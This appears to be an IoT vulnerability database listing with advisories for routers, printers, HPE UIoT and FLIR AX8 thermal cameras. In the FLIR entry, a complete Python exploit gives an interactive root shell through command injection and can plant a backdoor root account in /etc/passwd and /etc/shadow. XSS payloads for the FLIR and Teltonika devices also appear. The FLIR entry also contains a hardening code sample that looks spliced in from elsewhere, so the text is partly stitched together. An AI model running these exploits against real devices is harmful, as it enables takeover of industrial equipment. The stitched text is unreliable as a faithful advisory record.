VARIoT IoT vulnerabilities database


VAR-201810-1625 No CVE Command execution vulnerability in Dell Color Laser 1320c CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Dell Color Laser 1320c is a printer. Command execution vulnerability in Dell Color Laser 1320c. An attacker could use the vulnerability to execute a command.
VAR-201810-1604 CVE-2018-11336 Fastweb FASTGate modem Unauthorized Remote Command Execution Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Fastweb is a Swisscom subsidiary and the main fixed-network operator in Italy. FASTGate is Fastweb's latest generation of modem. An unauthenticated remote command execution vulnerability exists in the Fastweb FASTGate modem: an attacker can execute arbitrary commands on the remote device without authentication.
VAR-201810-1607 No CVE Code execution vulnerability in multiple versions of Xiaomi router CVSS V2: 6.5
CVSS V3: -
Severity: MEDIUM
Xiaomi router is a router. There is a code execution vulnerability in the Xiaomi router. An attacker could use the vulnerability to execute arbitrary code.
VAR-201810-1151 CVE-2018-7111 HPE UIoT Vulnerabilities in authorization, authority and access control CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A remote unauthorized access vulnerability was identified in HPE UIoT versions 1.5, 1.4.0, 1.4.1, 1.4.2, 1.2.4.2. Specifically, there is a malfunction identified in some section of the DSM portal and some DSM APIs. The impact of the malfunction is that the info can be changed by other users. HPE UIoT is a universal IoT platform from Hewlett Packard Enterprise (HPE). The platform has functions such as data analysis, currency security and synchronization management. A remote attacker could use this vulnerability to change other users' information. The following versions are affected: HPE UIoT 1.5, 1.4.0, 1.4.1, 1.4.2 and 1.2.4.2. HP UIoT is prone to an unauthorized-access vulnerability. Successful exploits may allow an attacker to obtain sensitive information or gain unauthorized administrative access. This may aid in further attacks.
VAR-201810-0110 CVE-2018-15765 Dell EMC Secure Remote Services Vulnerable to information disclosure CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
Dell EMC Secure Remote Services, versions prior to 3.32.00.08, contains an Information Exposure vulnerability. The log file contents store sensitive data including executed commands to generate authentication tokens which may prove useful to an attacker for crafting malicious authentication tokens for querying the application and subsequent attacks. Dell EMC ESRS virtual edition is prone to the following multiple security vulnerabilities:
1. An insecure file permission vulnerability
2. A plaintext password storage vulnerability
3. An information disclosure vulnerability
Successfully exploiting these issues can allow an attacker to obtain sensitive information, to bypass certain security restrictions to perform unauthorized actions, and to use the sensitive data available, which may aid in launching further attacks. This software is used to provide a remote connection between EMC customer service and the user's EMC products and solutions. An attacker could exploit this vulnerability to obtain information.
Details:
1. The application contains multiple configuration files with world-readable permissions that could allow an authenticated malicious user to utilize the file contents to potentially elevate their privileges. CVSSv3 Base Score: 7.3 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H)
2. Database credentials are stored in plaintext in a configuration file. An authenticated malicious user with access to the configuration file may obtain the exposed password to gain access to the application database. CVSSv3 Base Score: 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
3.
Severity Rating: For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307 (https://support.emc.com/kb/468307). Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability.
Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this advisory, contact Dell EMC Technical Support (https://support.emc.com/servicecenter/contactEMC/). The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall Dell EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Dell Product Security Incident Response Team, secure@dell.com
VAR-201810-0734 CVE-2018-18291 ASUS RT-AC58U Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A cross site scripting (XSS) vulnerability on ASUS RT-AC58U 3.0.0.4.380_6516 devices allows remote attackers to inject arbitrary web script or HTML via Advanced_ASUSDDNS_Content.asp, Advanced_WSecurity_Content.asp, Advanced_Wireless_Content.asp, Logout.asp, Main_Login.asp, MobileQIS_Login.asp, QIS_wizard.htma, YandexDNS.asp, ajax_status.xml, apply.cgi, clients.asp, disk.asp, disk_utility.asp, or internet.asp. The ASUS RT-AC58U device contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. ASUS RT-AC58U is a wireless router product from ASUS. A cross-site scripting vulnerability exists in ASUS RT-AC58U 3.0.0.4.380_6516 (multiple files are affected, including Advanced_ASUSDDNS_Content.asp, Advanced_WSecurity_Content.asp, Advanced_Wireless_Content.asp, Logout.asp, Main_Login.asp, MobileQIS_Login.asp, QIS_wizard.htma, YandexDNS.asp, ajax_status.xml, apply.cgi, clients.asp, Disk.asp, disk_utility.asp and internet.asp).
VAR-201810-0731 CVE-2018-18287 ASUS RT-AC58U Information disclosure vulnerability in devices CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
On ASUS RT-AC58U 3.0.0.4.380_6516 devices, remote attackers can discover hostnames and IP addresses by reading dhcpLeaseInfo data in the HTML source code of the Main_Login.asp page. The ASUS RT-AC58U device contains an information disclosure vulnerability. Information may be obtained. ASUS RT-AC58U is a wireless router product from ASUS. A security vulnerability exists in the ASUS RT-AC58U 3.0.0.4.380_6516 release.
VAR-202208-1438 CVE-2022-37060 FLIR Systems, Inc. flir ax8 firmware path traversal vulnerability CVSS V2: -
CVSS V3: 7.5
Severity: HIGH
FLIR AX8 thermal sensor cameras version up to and including 1.46.16 is vulnerable to Directory Traversal due to an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters to disclose the contents of files located outside of the server's restricted path. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16. A path traversal vulnerability exists in the firmware of the FLIR Systems, Inc. flir ax8. Information may be obtained. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.

The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.

The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary file disclosure vulnerability. This can be exploited to disclose the contents of arbitrary files via absolute path.

Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14.

# FLIR AX8 vulnerabilities

### Product description

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Summary of the 4 vulnerabilities found / What we were able to find

* [CVE-2022-37061] - Unauthenticated OS Command Injection. FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in the `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.
* [CVE-2022-37060] - Unauthenticated Directory Traversal.
* [CVE-2022-37062] - Improper Access Control. A successful exploit could allow the attacker to extract usernames and hashed passwords.
* [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code.

### Step by Step Example (How to Reproduce and verify) the vulnerabilities

1. Unauthenticated Remote Command Injection. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file. This command injection occurs because there is no sanitization check on the variable `$_POST["id"]`, line 65, so the value reaches the `shell_exec()` function and can execute unexpected arbitrary shell commands.
2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file path to download any file on the system. In the example below we create a crafted query that downloads the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However, a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggest that the developer thought about this problem and therefore created the variable `$path_parts`, which is sanitized. But for some reason the developer does not use the sanitized variable `$path_parts` when the function `fopen()` is called. Probably an oversight.
3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate, which lets any malicious actor download the `users.db` SQLite database.
4. Reflected cross-site scripting. In the settings tab, if a file whose filename contains JavaScript code is selected via the update-firmware file input, the JavaScript code will be triggered and executed. In our example, we created a file called `<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run`.

### Recommendations for how to fix the 4 vulnerabilities

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()`, which removes anything other than an integer value. `escapeshellcmd()` and `escapeshellarg()` must also be used to escape any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval, https://www.php.net/manual/en/function.escapeshellcmd, https://www.php.net/manual/en/function.escapeshellarg
* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()`, but also use a hard-coded directory path; if you need to manage several directories, set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo
* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html
* Vulnerability 4: To protect against a filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference

https://www.flir.com/products/ax8-automation/

### Security researchers

* [Thomas Knudsen](https://www.linkedin.com/in/thomasjknudsen)
* [Samy Younsi](https://www.linkedin.com/in/samy-younsi)
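As an added illustration of the fixes recommended above for vulnerabilities 1 and 2 (a constructed example, not FLIR's code and not from the advisory), a hardened version of the two request handlers: an authentication check first, a path-containment check for the download file name, and a strict pattern plus `escapeshellarg()` before anything from the request reaches the shell. The session key `authenticated`, the directory `/FLIR/usr/www/download` and the dispatch layout are assumptions; the same recommendations recur in the CVE-2022-37061 entry of this listing, and this one example covers both.

```php
<?php
// Constructed hardening example for the res.php / download.php defects described
// above; this is not FLIR's code. Assumed: the camera's login page sets
// $_SESSION['authenticated'], and DOWNLOAD_BASE is the only directory that
// download.php may serve files from.

define('DOWNLOAD_BASE', '/FLIR/usr/www/download');   // assumed download directory

// 1. Authentication first: both endpoints lacked any session check.
function require_login()
{
    session_start();
    if (empty($_SESSION['authenticated'])) {
        http_response_code(401);
        exit('authentication required');
    }
}

// 2. download.php: map the 'file' parameter onto a path that must stay inside $base.
//    Returns the resolved path, or null for empty/hidden names, names that would
//    escape the base directory (via ../, absolute paths or symlinks) and missing files.
function resolve_download($base, $userFile)
{
    $name = basename((string) $userFile);   // "../../etc/passwd" and "/etc/passwd" both become "passwd"
    if ($name === '' || $name[0] === '.') {
        return null;
    }
    $baseReal = realpath($base);
    $real     = realpath($base . DIRECTORY_SEPARATOR . $name);   // false when the file does not exist
    if ($baseReal === false || $real === false) {
        return null;
    }
    // Containment check: the canonical path must sit below the canonical base directory.
    if (strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// 3. res.php: a resource name reaches the shell only if it matches a strict
//    pattern, and then only as a single quoted argument, so ";", "|", spaces
//    and newlines in the POST body can never start a second command.
function build_rls_command($resource)
{
    if (!preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $resource)) {
        return null;                          // refuse rather than "clean up" the value
    }
    return 'LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ' . escapeshellarg($resource);
}

// The 'id' parameter is validated as a non-negative integer instead of being
// concatenated into a command string (the advisory's intval() recommendation,
// done with filter_var so that "7; id" is rejected instead of silently truncated).
function parse_id($raw)
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 0)));
    return ($id === false) ? null : $id;
}

// Dispatch sketch showing how the helpers fit together.
require_login();
if (isset($_GET['file'])) {
    $path = resolve_download(DOWNLOAD_BASE, $_GET['file']);
    if ($path === null) {
        http_response_code(400);
        exit('invalid file');
    }
    header('Content-Type: application/octet-stream');
    readfile($path);
} elseif (isset($_POST['resource'])) {
    $id  = isset($_POST['id']) ? parse_id($_POST['id']) : null;   // null means "absent or invalid"
    $cmd = build_rls_command($_POST['resource']);
    $result = ($cmd === null) ? 'false' : trim(shell_exec($cmd));
    echo json_encode(array('result' => $result, 'id' => $id));
}
```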
VAR-202208-1439 CVE-2022-37061 FLIR Systems, Inc. flir ax8 firmware OS command injection vulnerability CVSS V2: -
CVSS V3: 9.8
Severity: CRITICAL
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16. An OS command injection vulnerability exists in the firmware of the FLIR Systems, Inc. flir ax8. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).

/FLIR/usr/www/res.php (fragment; the line numbers are those shown in the advisory, and the lines between them are missing from this listing):

```php
<?php
2. if (isset($_POST["action"])) {
3. if(isset($_POST["resource"]))
6. {
7. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
10. break;
12. }
13. break;
15. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
17. break;
19. }
20. break;
22. default:
23. }
25. }
```

--------------------------------------------------------------------------------
/FLIR/usr/www/palette.php:
--------------------------

```php
1. <?php
2. if(isset($_POST["palette"])){
3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
4. }
6. ?>
```

--------------------------------------------------------------------------------

Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14.

# FLIR AX8 vulnerabilities

### Product description

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Summary of the 4 vulnerabilities found / What we were able to find

* [CVE-2022-37060] - Unauthenticated Directory Traversal. FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.
* [CVE-2022-37062] - Improper Access Control. FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.
* [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface.

### Step by Step Example (How to Reproduce and verify) the vulnerabilities

1. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file.
2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file path to download any file on the system. In the example below we create a crafted query that downloads the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However, a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggest that the developer thought about this problem and therefore created the variable `$path_parts`, which is sanitized. But for some reason the developer does not use the sanitized variable `$path_parts` when the function `fopen()` is called. Probably an oversight.
3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check whether the request is legitimate, which lets any malicious actor download the `users.db` SQLite database.
4. Reflected cross-site scripting. In the settings tab, if a file whose filename contains JavaScript code is selected via the update-firmware file input, the JavaScript code will be triggered and executed. In our example, we created a file called `<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run`.

### Recommendations for how to fix the 4 vulnerabilities

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()`, which removes anything other than an integer value. `escapeshellcmd()` and `escapeshellarg()` must also be used to escape any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval, https://www.php.net/manual/en/function.escapeshellcmd, https://www.php.net/manual/en/function.escapeshellarg
* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()`, but also use a hard-coded directory path; if you need to manage several directories, set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo
* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access.
This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html * Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Reference: https://www.flir.com/products/ax8-automation/ ### Security researchers: * [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen) * [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) . #!/usr/bin/env python # -*- coding: utf-8 -*- # # FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit # # # Vendor: FLIR Systems, Inc. The AX8 helps # you guard against unplanned outages, service interruptions, and equipment # failure. # # The FLIR AX series camera/sensor also has built-in support to connect to # industrial control equipment such as programmable logic controllers (PLCs), # and allows the sharing of analysis and alarm results and simple control # using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy # to install, the AX8 provides continuous monitoring of electrical cabinets, # process and manufacturing areas, data centers, energy generation and distribution, # transportation and mass transit, storage facilities and refrigeration warehouses. The issues can be triggered when calling # multiple unsanitized HTTP GET/POST parameters within the shell_exec function # in res.php and palette.php file. # # ============================================================================= # /FLIR/usr/www/res.php: # ---------------------- # 1. <?php # 2. if (isset($_POST["action"])) { # 3. switch ($_POST["action"]) { # 4. case "get": # 5. if(isset($_POST["resource"])) # 6. switch ($_POST["resource"]) { # 8. case ".rtp.hflip": # 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) { # 10. 
$result = "false"; # 11. break; # 12. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false"; # 14. break; # 15. case ".rtp.vflip": # 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) { # 17. $result = "false"; # 18. break; # 19. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false"; # 21. break; # 22. default: # 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"])); # 24. } # # ============================================================================= # /FLIR/usr/www/palette.php: # -------------------------- # 1. <?php # 2. if(isset($_POST["palette"])){ # 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]); # 4. echo json_encode(array("success")); # 5. ?> # # ============================================================================= # # # Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l) # lighttpd/1.4.33 # PHP/5.4.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2018-5491 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php # # # 26.07.2018 # import requests import colorama import random## import time#### import json#### import sys##### import os###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n' sys.exit() bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \\ | .---------------------------------. 
""" print bannah time.sleep(4) os.system('clear') print '\nFLIR AX8 Thermal Camera Remote Root Exploit' print 'By Zero Science Lab' ICU = ''' ```````` `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.` ```````` ''' colors = list(vars(colorama.Fore).values()) colored_chars = [random.choice(colors) + char for char in ICU] print(''.join(colored_chars)) print print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n' print '[*] Additional commands:' print ' [+] \'addroot\' for add root user.' print ' [+] \'exit\' for exit.\n' while True: zeTargets = 'http://'+sys.argv[1]+'/res.php' zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m') zeHeaders = {'Cache-Control' : 'max-age=0', 'User-Agent' : 'thricer/251.4ev4h', 'Accept' : 'text/html,application/xhtml+xml', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'close', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'action' : 'get', 'resource' : ';'+zeCommand} try: zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) print json.loads(zeRequest.text) if zeCommand.strip() == 'exit': sys.exit() if zeCommand.strip() == 'addroot': print '[+] Blind command injection using palette.php...' print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...' 
nuTargets = 'http://'+sys.argv[1]+'/palette.php' nuHeaders = zeHeaders nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31' '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f' '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d' '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45' '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67' '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36' '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39' '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a' '\\x3a\\x3a\\x0a\\x0d') nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'} nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'} requests.post(nuTargets, headers=nuHeaders, data=nuPadata1) time.sleep(2) requests.post(nuTargets, headers=nuHeaders, data=nuPadata2) print '[*] Success!\n' else: pass except Exception: print '[*] Error!' break sys.exit()
VAR-201810-1642 CVE-2018-25138 FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Hard-coded Credentials Shell Access CVSS V2: -
CVSS V3: 9.8
Severity: Critical
FLIR AX8 Thermal Camera 1.32.16 contains hard-coded SSH and web panel credentials that cannot be changed through normal camera operations. Attackers can exploit these persistent credentials to gain unauthorized shell access and login to multiple camera interfaces using predefined username and password combinations. Thermal Imaging Camera For Continuous Condition and Safety Monitoring: FLIR AX8 is a thermal sensor with imaging capabilities. Combining thermal and visual cameras in a small, affordable package, the AX8 provides continuous temperature monitoring and alarming capabilities to protect critical electrical and mechanical equipment. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure. The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses. The device uses hard-coded credentials within its Linux distribution image. An attacker could exploit this vulnerability by logging in using the default credentials for the web panel or gaining shell access. Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14.
VAR-201810-1635 CVE-2018-25139 FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure CVSS V2: -
CVSS V3: 7.5
Severity: High
FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage. Thermal Imaging Camera For Continuous Condition and Safety Monitoring: FLIR AX8 is a thermal sensor with imaging capabilities. Combining thermal and visual cameras in a small, affordable package, the AX8 provides continuous temperature monitoring and alarming capabilities to protect critical electrical and mechanical equipment. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure. The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses. The FLIR AX8 thermal sensor camera suffers from unauthenticated and unauthorized live RTSP video stream access. Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14.
VAR-201810-0456 CVE-2018-17533 Teltonika RUT9XX Router firmware cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Teltonika RUT9XX routers with firmware before 00.05.01.1 are prone to cross-site scripting vulnerabilities in hotspotlogin.cgi due to insufficient user input sanitization. Teltonika RUT9XX routers (whose web interface is based on LuCI) are router products of Teltonika, Lithuania.

* **Identifier** : SBA-ADV-20180410-01
* **Type of Vulnerability** : Cross Site Scripting
* **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/)
* **Vendor** : [Teltonika](https://teltonika.lt/)
* **Affected Versions** : Firmware RUT9XX_R_00.05.00.5 and probably prior
* **Fixed in Version** : RUT9XX_R_00.05.01.1
* **CVE ID** : CVE-2018-17533
* **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
* **CVSSv3 Base Score** : 8.2 (High)

## Vendor Description ##

> RUT955 is a highly reliable and secure LTE router with I/O, GNSS and
> RS232/RS485 for professional applications. Router delivers high
> performance, mission-critical cellular communication and GPS location
> capabilities.

Source: <https://teltonika.lt/product/rut955/>

## Impact ##

By exploiting the documented vulnerabilities, an attacker can execute JavaScript code in a user's browser within the origin of the router. The attacker might take over existing or future administrative web management sessions and gain access to the device.

## Solution ##

We recommend upgrading to version RUT9XX_R_00.05.01.1 or newer, which includes fixes for the vulnerabilities described in this advisory.

## Vulnerability Description ##

The affected script is part of the coova-chilli captive portal. However, in firmware versions before RUT9XX_R_00.04.233 the vulnerabilities are exploitable regardless of the device configuration, even if no captive portal is configured.

More concretely, the following parameters are vulnerable:

* `/cgi-bin/hotspotlogin.cgi`
  * *If* res=failed or res=notyet
    * challenge
    * uamip
    * uamport
    * userurl

The affected script outputs these input parameters in an HTML context without proper output encoding. The vulnerabilities are located in `hotspotlogin.cgi`:

```lua
[...]
elseif result == 2 or result == 5 then
    replace_tags.formHeader = [[<form name="myForm" method="post" action="]] .. loginpath .. [[">
    <INPUT TYPE="hidden" NAME="challenge" VALUE="]] .. challenge .. [[">
    <INPUT TYPE="hidden" NAME="]] .. names["uamip"] .. [[" VALUE="]] .. uamip .. [[">
    <INPUT TYPE="hidden" NAME="]] .. names["uamport"] .. [[" VALUE="]] .. uamport .. [[">
    <INPUT TYPE="hidden" NAME="]] .. names["userurl"] .. [[" VALUE="]] .. userurldecode .. [[">
    <INPUT TYPE="hidden" NAME="res" VALUE="]] .. res .. [[">]]
    replace_tags.formFooter = [[</form>]]
[...]
```

As the above code snippet shows, the parameter `userurl` contains user input and is output without performing any HTML escaping.

## Proof-of-Concept ##

An attacker can exploit this vulnerability by manipulating the `userurl` query parameter:

```text
http://<IP>/cgi-bin/hotspotlogin.cgi?res=failed&userurl="><script>alert(1)</script><span
```

An attacker can exploit the other parameters (e.g. challenge) via POST requests:

```html
<form action="http://<IP>/cgi-bin/hotspotlogin.cgi" method="post" enctype="text/plain">
  <input type="hidden" name="res" value="failed&challenge=&quot;><script>alert(1)</script><span&quot;">
  <input type="submit" value="challenge">
</form>
```

## Timeline ##

